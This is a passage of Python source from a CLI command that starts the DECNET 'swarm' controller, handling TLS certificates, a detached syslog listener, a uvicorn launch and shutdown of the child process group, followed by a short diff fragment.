        if you need a publicly-trusted or externally-managed cert.
        """
        _require_master_mode("swarmctl")

        # Reject a half-specified BYOC pair before any side effect. Previously
        # this check ran after daemonizing and after the detached listener had
        # been spawned, so a usage error left a stray listener behind.
        if tls and bool(cert) != bool(key):
            console.print("[red]--cert and --key must be provided together.[/]")
            raise typer.Exit(code=2)

        if daemon:
            log.info("swarmctl daemonizing host=%s port=%d", host, port)
            _utils._daemonize()

        if not no_listener:
            # The listener bind address and port come from the environment,
            # not from this command's own --host/--port.
            listener_host = os.environ.get("DECNET_LISTENER_HOST", "0.0.0.0")  # nosec B104
            listener_port = int(os.environ.get("DECNET_SWARM_SYSLOG_PORT", "6514"))
            lst_argv = [
                sys.executable, "-m", "decnet", "listener",
                "--host", listener_host,
                "--port", str(listener_port),
                "--daemon",
            ]
            # Best-effort: a listener that cannot be spawned is reported but
            # does not stop the controller from starting.
            try:
                pid = _utils._spawn_detached(lst_argv, _utils._pid_dir() / "listener.pid")
                log.info("swarmctl auto-spawned listener pid=%d bind=%s:%d",
                         pid, listener_host, listener_port)
                console.print(f"[dim]Auto-spawned listener (pid {pid}) on {listener_host}:{listener_port}.[/]")
            except Exception as e:  # noqa: BLE001
                log.warning("swarmctl could not auto-spawn listener: %s", e)
                console.print(f"[yellow]listener auto-spawn skipped: {e}[/]")

        log.info("swarmctl command invoked host=%s port=%d tls=%s", host, port, tls)
        scheme = "https" if tls else "http"
        console.print(f"[green]Starting DECNET SWARM controller on {scheme}://{host}:{port}...[/]")
        _cmd = [sys.executable, "-m", "uvicorn", "decnet.web.swarm_api:app",
                "--host", host, "--port", str(port)]

        if tls:
            from decnet.swarm import pki as _pki
            if cert and key:
                cert_path, key_path = cert, key
            else:
                # Neither given (a mismatched pair was rejected above).
                auto_cert, auto_key, _auto_ca = _pki.ensure_swarmctl_cert(host)
                cert_path, key_path = str(auto_cert), str(auto_key)
                console.print(f"[dim]Auto-issued swarmctl server cert → {cert_path}[/]")
            ca_path = client_ca or str(_pki.DEFAULT_CA_DIR / "ca.crt")
            _cmd += [
                "--ssl-keyfile", key_path,
                "--ssl-certfile", cert_path,
                "--ssl-ca-certs", ca_path,
                # 2 == ssl.CERT_REQUIRED: clients must present a valid cert.
                "--ssl-cert-reqs", "2",
            ]

        try:
            # The child runs in its own session, so Ctrl-C is not delivered to
            # it; the handler below forwards the shutdown to its process group.
            proc = subprocess.Popen(_cmd, start_new_session=True)  # nosec B603 B404
            try:
                proc.wait()
            except KeyboardInterrupt:
                try:
                    os.killpg(proc.pid, signal.SIGTERM)
                    try:
                        proc.wait(timeout=10)
                    except subprocess.TimeoutExpired:
                        # Graceful stop timed out; force-kill the group.
                        os.killpg(proc.pid, signal.SIGKILL)
                        proc.wait()
                except ProcessLookupError:
                    # The process group is already gone.
                    pass
        except (FileNotFoundError, subprocess.SubprocessError):
            console.print("[red]Failed to start swarmctl. Ensure 'uvicorn' is installed in the current environment.[/]")
--- a/Show More
+++ b/Show More
		`@@ -1 +0,0 @@`
			`Collector starting → /home/anti/Tools/DECNET/decnet.log`
		`@@ -0,0 +1 @@`
							`"""Artifact storage helpers shared between the web router and TTP workers."""`